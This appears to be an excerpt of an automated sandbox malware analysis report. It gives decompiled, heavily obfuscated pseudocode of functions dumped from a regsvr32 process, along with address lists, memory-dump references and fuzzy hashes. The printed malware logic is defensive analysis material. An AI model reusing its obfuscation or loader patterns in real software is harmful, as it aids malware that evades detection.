							_t162 =  &(_t162[3]);
							_t141 = 0x6034e01;
							continue;
						}
						if(_t141 == 0xc69c393) {
							_t137 =  *0x1c4c10; // 0x67d820
							__eflags = _t137 + 0x20c;
							return E001A91F2(_v556, _v544, _v528, _t160, _v548, _t137 + 0x20c);
						}
						if(_t141 != 0xfbe1412) {
							goto L15;
						}
						_t141 = 0x6481137;
					}
					_v568 = 0xcc527e;
					_v568 = _v568 + 0x2f2a;
					_v568 = _v568 | 0x82fe02a2;
					_v568 = _v568 * 0x46;
					_v568 = _v568 ^ 0xd198007e;
					_t134 = E001B0184(_v524, _v560,  &_v520, _v536, _v552);
					_t162 =  &(_t162[3]);
					_t160 =  &_v520 + _t134 * 2;
					while(1) {
						_t135 =  &_v520;
						__eflags = _t160 - _t135;
						if(_t160 <= _t135) {
							break;
						}
						__eflags =  *_t160 - 0x5c;
						if( *_t160 != 0x5c) {
							L10:
							_t160 = _t160 - 2;
							__eflags = _t160;
							continue;
						}
						_t114 =  &_v568;
						 *_t114 = _v568 - 1;
						__eflags =  *_t114;
						if( *_t114 == 0) {
							__eflags = _t160;
							L14:
							_t141 = 0xc69c393;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t141 - 0x5d7b874;
				} while (__eflags != 0);
				return _t135;
			}

























                                                                                                                0x001a7761
                                                                                                                0x001a7767
                                                                                                                0x001a7771
                                                                                                                0x001a7779
                                                                                                                0x001a777e
                                                                                                                0x001a7783
                                                                                                                0x001a778b
                                                                                                                0x001a779c
                                                                                                                0x001a77b0
                                                                                                                0x001a77b5
                                                                                                                0x001a77c4
                                                                                                                0x001a77c9
                                                                                                                0x001a77cf
                                                                                                                0x001a77d7
                                                                                                                0x001a77df
                                                                                                                0x001a77e4
                                                                                                                0x001a77e9
                                                                                                                0x001a77f1
                                                                                                                0x001a77fe
                                                                                                                0x001a77ff
                                                                                                                0x001a7803
                                                                                                                0x001a780b
                                                                                                                0x001a7818
                                                                                                                0x001a781c
                                                                                                                0x001a7821
                                                                                                                0x001a7826
                                                                                                                0x001a782e
                                                                                                                0x001a783c
                                                                                                                0x001a7840
                                                                                                                0x001a7845
                                                                                                                0x001a784d
                                                                                                                0x001a7855
                                                                                                                0x001a785f
                                                                                                                0x001a7863
                                                                                                                0x001a786b
                                                                                                                0x001a7873
                                                                                                                0x001a7878
                                                                                                                0x001a7885
                                                                                                                0x001a7889
                                                                                                                0x001a7891
                                                                                                                0x001a7899
                                                                                                                0x001a789e
                                                                                                                0x001a78a6
                                                                                                                0x001a78ae
                                                                                                                0x001a78b6
                                                                                                                0x001a78be
                                                                                                                0x001a78ca
                                                                                                                0x001a78d2
                                                                                                                0x001a78d7
                                                                                                                0x001a78dc
                                                                                                                0x001a78e4
                                                                                                                0x001a78e4
                                                                                                                0x001a78ea
                                                                                                                0x001a7916
                                                                                                                0x001a791b
                                                                                                                0x001a791e
                                                                                                                0x00000000
                                                                                                                0x001a791e
                                                                                                                0x001a78ee
                                                                                                                0x001a799d
                                                                                                                0x001a79a2
                                                                                                                0x00000000
                                                                                                                0x001a79be
                                                                                                                0x001a78fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a7900
                                                                                                                0x001a7900
                                                                                                                0x001a7922
                                                                                                                0x001a792a
                                                                                                                0x001a7932
                                                                                                                0x001a793f
                                                                                                                0x001a7947
                                                                                                                0x001a7960
                                                                                                                0x001a7969
                                                                                                                0x001a796c
                                                                                                                0x001a7980
                                                                                                                0x001a7980
                                                                                                                0x001a7984
                                                                                                                0x001a7986
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a7971
                                                                                                                0x001a7975
                                                                                                                0x001a797d
                                                                                                                0x001a797d
                                                                                                                0x001a797d
                                                                                                                0x00000000
                                                                                                                0x001a797d
                                                                                                                0x001a7977
                                                                                                                0x001a7977
                                                                                                                0x001a7977
                                                                                                                0x001a797b
                                                                                                                0x001a798a
                                                                                                                0x001a798d
                                                                                                                0x001a798d
                                                                                                                0x00000000
                                                                                                                0x001a798d
                                                                                                                0x00000000
                                                                                                                0x001a797b
                                                                                                                0x00000000
                                                                                                                0x001a798f
                                                                                                                0x001a798f
                                                                                                                0x001a798f
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: */$=a2$~
                                                                                                                • API String ID: 0-332255120
                                                                                                                • Opcode ID: ae005268946215869e8c5e69cb8fe6cb2a68d3cca99e31459b88624509bd5bb4
                                                                                                                • Instruction ID: ef29f58ebb5660f2f5436d20ee777f9ef652af50974066953457937ea162508d
                                                                                                                • Opcode Fuzzy Hash: ae005268946215869e8c5e69cb8fe6cb2a68d3cca99e31459b88624509bd5bb4
                                                                                                                • Instruction Fuzzy Hash: 215141B54083419BC358CF24C88981FFBE1FBD5798F504A2EF49A96260D3B1CA48CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B3231 Relevance: 3.9, Strings: 3, Instructions: 125COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001B3231(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				void* _t89;
				intOrPtr _t107;
				void* _t109;
				signed int _t111;
				signed int _t112;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;

				_push(_a8);
				_t109 = __edx;
				_t124 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t89);
				_v12 = 0x9e1bdd;
				_t126 = _t125 + 0x10;
				_v12 = _v12 + 0xffffdbfa;
				_v12 = _v12 ^ 0x0091ddee;
				_t122 = 0;
				_v40 = 0x315724;
				_t123 = 0x9e9303b;
				_t9 =  &_v40; // 0x315724
				_t111 = 0x66;
				_v40 =  *_t9 / _t111;
				_t112 = 0x47;
				_v40 = _v40 * 0x5f;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0x0002240c;
				_v16 = 0x950e6a;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x0004f4e3;
				_v28 = 0xc9a4f1;
				_v28 = _v28 | 0x09c7a1f0;
				_v28 = _v28 + 0xb97d;
				_v28 = _v28 ^ 0x09d6564c;
				_v4 = 0x7f9b21;
				_v4 = _v4 * 0x57;
				_v4 = _v4 ^ 0x2b54a2fc;
				_v20 = 0x4a24c5;
				_v20 = _v20 ^ 0xa91ef105;
				_v20 = _v20 ^ 0x28925536;
				_v20 = _v20 ^ 0x81c3e501;
				_v8 = 0xf09817;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0x0f0c6c3d;
				_v24 = 0x3764b;
				_v24 = _v24 + 0xffff0e15;
				_v24 = _v24 ^ 0x7e60aae8;
				_v24 = _v24 ^ 0x7e6a1555;
				_v32 = 0xd377e9;
				_v32 = _v32 * 0x53;
				_v32 = _v32 + 0xffff50fb;
				_v32 = _v32 + 0xaabe;
				_v32 = _v32 ^ 0x44829b96;
				_v36 = 0xa4d360;
				_v36 = _v36 ^ 0xd4623be5;
				_v36 = _v36 / _t112;
				_v36 = _v36 * 0x47;
				_v36 = _v36 ^ 0xd4c62218;
				do {
					while(_t123 != 0xc87266) {
						if(_t123 == 0x1487e0e) {
							E001B8CF2(_t112);
							_t123 = 0x9022d31;
							continue;
						} else {
							if(_t123 == 0x9022d31) {
								E001B17D2(_v32, _v36,  *0x1c4218);
							} else {
								if(_t123 == 0x9e9303b) {
									_push(_t112);
									_t107 = E001A303A(_t112, 0x2c);
									_t126 = _t126 + 0xc;
									 *0x1c4218 = _t107;
									_t123 = 0xd661d67;
									continue;
								} else {
									if(_t123 != 0xd661d67) {
										goto L12;
									} else {
										if(E001BE5ED() != 0) {
											_t123 = 0xc87266;
											continue;
										}
									}
								}
							}
						}
						L15:
						return _t122;
					}
					_t112 = _v4;
					_t122 = E001ABDEB(_t112, _v20, _v8, _v24, _t109, _t124);
					_t126 = _t126 + 0x10;
					if(_t122 == 0) {
						_t123 = 0x1487e0e;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t123 != 0xbdc82e9);
				goto L15;
			}























                                                                                                                0x001b3238
                                                                                                                0x001b323c
                                                                                                                0x001b323e
                                                                                                                0x001b3240
                                                                                                                0x001b3244
                                                                                                                0x001b3245
                                                                                                                0x001b3246
                                                                                                                0x001b324b
                                                                                                                0x001b3253
                                                                                                                0x001b3256
                                                                                                                0x001b3260
                                                                                                                0x001b3268
                                                                                                                0x001b326a
                                                                                                                0x001b3272
                                                                                                                0x001b3277
                                                                                                                0x001b327d
                                                                                                                0x001b3282
                                                                                                                0x001b328d
                                                                                                                0x001b328e
                                                                                                                0x001b3292
                                                                                                                0x001b3297
                                                                                                                0x001b329f
                                                                                                                0x001b32a7
                                                                                                                0x001b32ac
                                                                                                                0x001b32b4
                                                                                                                0x001b32bc
                                                                                                                0x001b32c4
                                                                                                                0x001b32cc
                                                                                                                0x001b32d4
                                                                                                                0x001b32e1
                                                                                                                0x001b32e5
                                                                                                                0x001b32ed
                                                                                                                0x001b32f5
                                                                                                                0x001b32fd
                                                                                                                0x001b3305
                                                                                                                0x001b330d
                                                                                                                0x001b3315
                                                                                                                0x001b331a
                                                                                                                0x001b3322
                                                                                                                0x001b332a
                                                                                                                0x001b3332
                                                                                                                0x001b333a
                                                                                                                0x001b3342
                                                                                                                0x001b334f
                                                                                                                0x001b3353
                                                                                                                0x001b335b
                                                                                                                0x001b3363
                                                                                                                0x001b336b
                                                                                                                0x001b3373
                                                                                                                0x001b3381
                                                                                                                0x001b338a
                                                                                                                0x001b338e
                                                                                                                0x001b3396
                                                                                                                0x001b3396
                                                                                                                0x001b33a4
                                                                                                                0x001b33fe
                                                                                                                0x001b3403
                                                                                                                0x00000000
                                                                                                                0x001b33a6
                                                                                                                0x001b33ac
                                                                                                                0x001b344b
                                                                                                                0x001b33b2
                                                                                                                0x001b33b8
                                                                                                                0x001b33e6
                                                                                                                0x001b33ea
                                                                                                                0x001b33ef
                                                                                                                0x001b33f2
                                                                                                                0x001b33f7
                                                                                                                0x00000000
                                                                                                                0x001b33ba
                                                                                                                0x001b33c0
                                                                                                                0x00000000
                                                                                                                0x001b33c2
                                                                                                                0x001b33c9
                                                                                                                0x001b33cf
                                                                                                                0x00000000
                                                                                                                0x001b33cf
                                                                                                                0x001b33c9
                                                                                                                0x001b33c0
                                                                                                                0x001b33b8
                                                                                                                0x001b33ac
                                                                                                                0x001b3451
                                                                                                                0x001b345a
                                                                                                                0x001b345a
                                                                                                                0x001b3418
                                                                                                                0x001b3421
                                                                                                                0x001b3423
                                                                                                                0x001b3428
                                                                                                                0x001b342a
                                                                                                                0x00000000
                                                                                                                0x001b342a
                                                                                                                0x00000000
                                                                                                                0x001b342f
                                                                                                                0x001b342f
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $W1$;0$;0
                                                                                                                • API String ID: 0-91903146
                                                                                                                • Opcode ID: 0d6e2efdc71dff4e55242f3d914b4aecbe4259729b601e8b76972b97f3e0bf45
                                                                                                                • Instruction ID: b6465a2d33ac1ab6144c0b0f994076ca915f06c8efee73b3f04f583b95520605
                                                                                                                • Opcode Fuzzy Hash: 0d6e2efdc71dff4e55242f3d914b4aecbe4259729b601e8b76972b97f3e0bf45
                                                                                                                • Instruction Fuzzy Hash: AC5167B180C3419BC358DF25D58A45BBBE0FBD8358F104A2DF89A96261D770CE898F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BCFA0 Relevance: 3.9, Strings: 3, Instructions: 110COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001BCFA0(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __ecx;
				void* _t77;
				signed int _t91;
				void* _t94;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;

				_push(_a12);
				_t110 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001AC98A(_t77);
				_v68 = 0x3d13dc;
				_t114 = _t113 + 0x14;
				_v68 = _v68 + 0xffff37a9;
				_v68 = _v68 << 0x10;
				_t111 = 0;
				_t94 = 0x648648f;
				_t91 = 9;
				_v68 = _v68 * 0x3c;
				_v68 = _v68 ^ 0xb3278696;
				_v72 = 0xad18f7;
				_v72 = _v72 * 0x27;
				_v72 = _v72 | 0xb4d7919b;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x001f4030;
				_v76 = 0xd15492;
				_v76 = _v76 * 0x7d;
				_v76 = _v76 + 0x806d;
				_v76 = _v76 ^ 0x99b03997;
				_v76 = _v76 ^ 0xff889a07;
				_v80 = 0x265a56;
				_v80 = _v80 << 7;
				_v80 = _v80 | 0x3cc0788d;
				_v80 = _v80 + 0xca1f;
				_v80 = _v80 ^ 0x3fe75cc9;
				_v84 = 0x2d111;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 / _t91;
				_v84 = _v84 * 0x2d;
				_v84 = _v84 ^ 0x000c9f83;
				_v60 = 0xb69336;
				_v60 = _v60 + 0xffff8f7c;
				_v60 = _v60 ^ 0x00b95011;
				_v64 = 0xe3dc18;
				_v64 = _v64 + 0x5a36;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x1c8e68e2;
				do {
					while(_t94 != 0x206608e) {
						if(_t94 == 0x228f481) {
							__eflags = E001AA903(_v80, _t110 + 0x1c, __eflags, _v84,  &_v56);
							if(__eflags != 0) {
								_t94 = 0xae6af81;
								continue;
							}
						} else {
							if(_t94 == 0x648648f) {
								_t94 = 0x206608e;
								continue;
							} else {
								_t119 = _t94 - 0xae6af81;
								if(_t94 != 0xae6af81) {
									goto L11;
								} else {
									E001AA903(_v60, _t110, _t119, _v64,  &_v56);
									_t111 =  !=  ? 1 : _t111;
								}
							}
						}
						L6:
						return _t111;
					}
					E001A6DD9( &_v56, _v68, _v72, _a4, _v76);
					_t114 = _t114 + 0xc;
					_t94 = 0x228f481;
					L11:
					__eflags = _t94 - 0xa5675e3;
				} while (__eflags != 0);
				goto L6;
			}



















                                                                                                                0x001bcfa7
                                                                                                                0x001bcfab
                                                                                                                0x001bcfad
                                                                                                                0x001bcfb1
                                                                                                                0x001bcfb5
                                                                                                                0x001bcfb7
                                                                                                                0x001bcfbc
                                                                                                                0x001bcfc4
                                                                                                                0x001bcfc7
                                                                                                                0x001bcfd1
                                                                                                                0x001bcfd6
                                                                                                                0x001bcfdd
                                                                                                                0x001bcfe4
                                                                                                                0x001bcfea
                                                                                                                0x001bcfee
                                                                                                                0x001bcff6
                                                                                                                0x001bd003
                                                                                                                0x001bd007
                                                                                                                0x001bd00f
                                                                                                                0x001bd014
                                                                                                                0x001bd01c
                                                                                                                0x001bd029
                                                                                                                0x001bd02d
                                                                                                                0x001bd035
                                                                                                                0x001bd03d
                                                                                                                0x001bd045
                                                                                                                0x001bd04d
                                                                                                                0x001bd052
                                                                                                                0x001bd05a
                                                                                                                0x001bd062
                                                                                                                0x001bd06a
                                                                                                                0x001bd072
                                                                                                                0x001bd082
                                                                                                                0x001bd08b
                                                                                                                0x001bd08f
                                                                                                                0x001bd097
                                                                                                                0x001bd09f
                                                                                                                0x001bd0a7
                                                                                                                0x001bd0af
                                                                                                                0x001bd0b7
                                                                                                                0x001bd0bf
                                                                                                                0x001bd0c4
                                                                                                                0x001bd0cc
                                                                                                                0x001bd0cc
                                                                                                                0x001bd0d6
                                                                                                                0x001bd127
                                                                                                                0x001bd129
                                                                                                                0x001bd12b
                                                                                                                0x00000000
                                                                                                                0x001bd12b
                                                                                                                0x001bd0d8
                                                                                                                0x001bd0de
                                                                                                                0x001bd10c
                                                                                                                0x00000000
                                                                                                                0x001bd0e0
                                                                                                                0x001bd0e0
                                                                                                                0x001bd0e2
                                                                                                                0x00000000
                                                                                                                0x001bd0e4
                                                                                                                0x001bd0f3
                                                                                                                0x001bd0ff
                                                                                                                0x001bd0ff
                                                                                                                0x001bd0e2
                                                                                                                0x001bd0de
                                                                                                                0x001bd103
                                                                                                                0x001bd10b
                                                                                                                0x001bd10b
                                                                                                                0x001bd143
                                                                                                                0x001bd148
                                                                                                                0x001bd14b
                                                                                                                0x001bd150
                                                                                                                0x001bd150
                                                                                                                0x001bd150
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6Z$VZ&$uV
                                                                                                                • API String ID: 0-3689900115
                                                                                                                • Opcode ID: f616f49b9d7bdd31c6dddbbdda0d23d408ccc6974a6b0e82ee55db1157acff6a
                                                                                                                • Instruction ID: 1525c448f76ddb03df012d4440413453f72ece8b262611bf72e11b5e3de08b14
                                                                                                                • Opcode Fuzzy Hash: f616f49b9d7bdd31c6dddbbdda0d23d408ccc6974a6b0e82ee55db1157acff6a
                                                                                                                • Instruction Fuzzy Hash: 0A4175715083429FC758DE21E84A42FBBE5FBD8758F104A1EF18666260E771CA49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10048DF9 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10048DF9(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E100428E5());
				 *0x100719a0 = 0;
				return _t8;
			}




                                                                                                                0x10048dfe
                                                                                                                0x10048e0e
                                                                                                                0x10048e14
                                                                                                                0x10048e1b

                                                                                                                APIs
                                                                                                                • __decode_pointer.LIBCMT ref: 10048E07
                                                                                                                  • Part of subcall function 100428E5: TlsGetValue.KERNEL32 ref: 100428F2
                                                                                                                  • Part of subcall function 100428E5: TlsGetValue.KERNEL32 ref: 10042909
                                                                                                                  • Part of subcall function 100428E5: RtlDecodePointer.NTDLL(00000001,?,10042CA7,00000000,00000000,1003D0AE,00000000,?,?,00000001,?,?,1003D112,00000001), ref: 1004293C
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10048E0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433037573-0
                                                                                                                • Opcode ID: 1694735086561c3d0c2e9fe4d53c21587adcff350f741b0175528a127f6e24d4
                                                                                                                • Instruction ID: 8abcfc1f3ce238d97d48462d2802736469083da4d035ff50501f691623c870d9
                                                                                                                • Opcode Fuzzy Hash: 1694735086561c3d0c2e9fe4d53c21587adcff350f741b0175528a127f6e24d4
                                                                                                                • Instruction Fuzzy Hash: 0FC08C0CC182C04BE340C73C9CAC39E7A01AB46040FD8C49DD5C0C10C3CE6C504AC12A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B9285 Relevance: 2.7, Strings: 2, Instructions: 229COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001B9285() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				short _t245;
				short _t254;
				void* _t256;
				intOrPtr _t279;
				void* _t280;
				short* _t281;
				void* _t282;
				short* _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				void* _t293;

				_v104 = _v104 & 0x00000000;
				_v100 = _v100 & 0x00000000;
				_t256 = 0xfb401bb;
				_v112 = 0xb6520e;
				_v108 = 0x77a7da;
				_t279 =  *0x1c4c10; // 0x67d820
				_v48 = 0xca99ef;
				_t280 = _t279 + 0x20c;
				_v48 = _v48 | 0xf0ff7fff;
				_v48 = _v48 ^ 0xf0f3d62d;
				_v76 = 0xc110de;
				_t284 = 0x36;
				_v76 = _v76 * 0x5b;
				_v76 = _v76 ^ 0x44aa4678;
				_v72 = 0x558166;
				_v72 = _v72 / _t284;
				_v72 = _v72 ^ 0x0000e0a5;
				_v52 = 0x5b7f54;
				_v52 = _v52 + 0x1f1f;
				_v52 = _v52 ^ 0xa5ab1809;
				_v52 = _v52 ^ 0xa5f131a6;
				_v12 = 0xff5e7d;
				_t285 = 0x4e;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffff4958;
				_v12 = _v12 ^ 0x001194e7;
				_v60 = 0x2907de;
				_v60 = _v60 ^ 0xd1668794;
				_v60 = _v60 * 0x44;
				_v60 = _v60 ^ 0x9914720f;
				_v8 = 0x89eaa7;
				_v8 = _v8 | 0x7fdf7905;
				_v8 = _v8 ^ 0x247f3cb2;
				_v8 = _v8 ^ 0x5baeb6bd;
				_v56 = 0xb228b6;
				_v56 = _v56 >> 7;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x00094367;
				_v84 = 0x30b30b;
				_v84 = _v84 << 0xf;
				_v84 = _v84 ^ 0x59856f3b;
				_v80 = 0xda8340;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00131eed;
				_v16 = 0x964de4;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 << 0xb;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x2400dd8a;
				_v64 = 0xb43aa1;
				_v64 = _v64 / _t285;
				_t286 = 0x32;
				_v64 = _v64 / _t286;
				_v64 = _v64 ^ 0x0009ca74;
				_v28 = 0x6a8;
				_v28 = _v28 | 0xafd2b135;
				_t287 = 0x5b;
				_v28 = _v28 / _t287;
				_v28 = _v28 * 0x79;
				_v28 = _v28 ^ 0xe9c9c4ae;
				_v24 = 0x9c0a45;
				_v24 = _v24 | 0xffef9ffe;
				_v24 = _v24 ^ 0xfff79bae;
				_v20 = 0x6ae438;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xa28aafdf;
				_v20 = _v20 + 0x4f32;
				_v20 = _v20 ^ 0x0911bfd6;
				_v40 = 0xa4caa8;
				_v40 = _v40 >> 7;
				_v40 = _v40 + 0xffffde1f;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x24f3925d;
				_v88 = 0x6bd929;
				_v88 = _v88 + 0xffffe4bd;
				_v88 = _v88 ^ 0x006be19c;
				_v36 = 0x6fd694;
				_t288 = 0x56;
				_v36 = _v36 / _t288;
				_v36 = _v36 + 0xffff4007;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x0008fb7a;
				_v32 = 0x3d45c7;
				_v32 = _v32 | 0x8d66135e;
				_v32 = _v32 << 7;
				_v32 = _v32 + 0xffffa23e;
				_v32 = _v32 ^ 0xbfa8b5be;
				_v44 = 0x3fd938;
				_v44 = _v44 >> 7;
				_t289 = 0x27;
				_v44 = _v44 / _t289;
				_v44 = _v44 + 0x119f;
				_v44 = _v44 ^ 0x00099788;
				_v68 = 0x1d5749;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0x8428;
				_v68 = _v68 ^ 0x000ea71d;
				_v96 = 0x2444b6;
				_t290 = 0x5e;
				_v96 = _v96 / _t290;
				_v96 = _v96 ^ 0x000108a9;
				_v92 = 0x7d170d;
				_v92 = _v92 + 0xdcaa;
				_v92 = _v92 ^ 0x007c0762;
				do {
					while(_t256 != 0x2c64ce1) {
						if(_t256 == 0x4461948) {
							E001A8744(_v44, _v68, 1, _v96, 3, _t280, _v92);
							 *((short*)(_t280 + 6)) = 0;
							return 0;
						}
						if(_t256 == 0x9842e60) {
							_push(0x10);
							_t292 = E001B96D4(_t256, 4);
							E001A8744(_v12, _v60, 2, _v8, 1, _t280, _v56);
							_t282 = _t280 + 2;
							E001A8744(_v84, _v80, 1, _v16, _t292, _t282, _v64);
							_t293 = _t293 + 0x34;
							_t283 = _t282 + _t292 * 2;
							_t256 = 0x2c64ce1;
							_t254 = 0x5c;
							 *_t283 = _t254;
							_t280 = _t283 + 2;
							continue;
						}
						if(_t256 != 0xfb401bb) {
							goto L8;
						}
						_t254 = E001ACCA2();
						_t256 = 0x9842e60;
					}
					_push(0x10);
					_t291 = E001B96D4(_t256, 4);
					E001A8744(_v40, _v88, 1, _v36, _t291, _t280, _v32);
					_t293 = _t293 + 0x20;
					_t281 = _t280 + _t291 * 2;
					_t256 = 0x4461948;
					_t245 = 0x2e;
					 *_t281 = _t245;
					_t280 = _t281 + 2;
					L8:
				} while (_t256 != 0x9891b4d);
				return _t254;
			}
















































                                                                                                                0x001b928b
                                                                                                                0x001b9291
                                                                                                                0x001b9295
                                                                                                                0x001b929a
                                                                                                                0x001b92a1
                                                                                                                0x001b92aa
                                                                                                                0x001b92b0
                                                                                                                0x001b92b7
                                                                                                                0x001b92bd
                                                                                                                0x001b92c4
                                                                                                                0x001b92cb
                                                                                                                0x001b92d8
                                                                                                                0x001b92db
                                                                                                                0x001b92de
                                                                                                                0x001b92e5
                                                                                                                0x001b92f3
                                                                                                                0x001b92f6
                                                                                                                0x001b92fd
                                                                                                                0x001b9304
                                                                                                                0x001b930b
                                                                                                                0x001b9312
                                                                                                                0x001b9319
                                                                                                                0x001b9324
                                                                                                                0x001b9327
                                                                                                                0x001b932a
                                                                                                                0x001b932e
                                                                                                                0x001b9335
                                                                                                                0x001b933c
                                                                                                                0x001b9343
                                                                                                                0x001b934e
                                                                                                                0x001b9351
                                                                                                                0x001b9358
                                                                                                                0x001b935f
                                                                                                                0x001b9366
                                                                                                                0x001b936d
                                                                                                                0x001b9374
                                                                                                                0x001b937b
                                                                                                                0x001b937f
                                                                                                                0x001b9383
                                                                                                                0x001b938a
                                                                                                                0x001b9391
                                                                                                                0x001b9395
                                                                                                                0x001b939c
                                                                                                                0x001b93a3
                                                                                                                0x001b93a7
                                                                                                                0x001b93ae
                                                                                                                0x001b93b5
                                                                                                                0x001b93b9
                                                                                                                0x001b93bd
                                                                                                                0x001b93c1
                                                                                                                0x001b93c8
                                                                                                                0x001b93d6
                                                                                                                0x001b93dc
                                                                                                                0x001b93e1
                                                                                                                0x001b93e6
                                                                                                                0x001b93ed
                                                                                                                0x001b93f4
                                                                                                                0x001b93fe
                                                                                                                0x001b9401
                                                                                                                0x001b9408
                                                                                                                0x001b940d
                                                                                                                0x001b9414
                                                                                                                0x001b941b
                                                                                                                0x001b9422
                                                                                                                0x001b9429
                                                                                                                0x001b9430
                                                                                                                0x001b9434
                                                                                                                0x001b943b
                                                                                                                0x001b9442
                                                                                                                0x001b9449
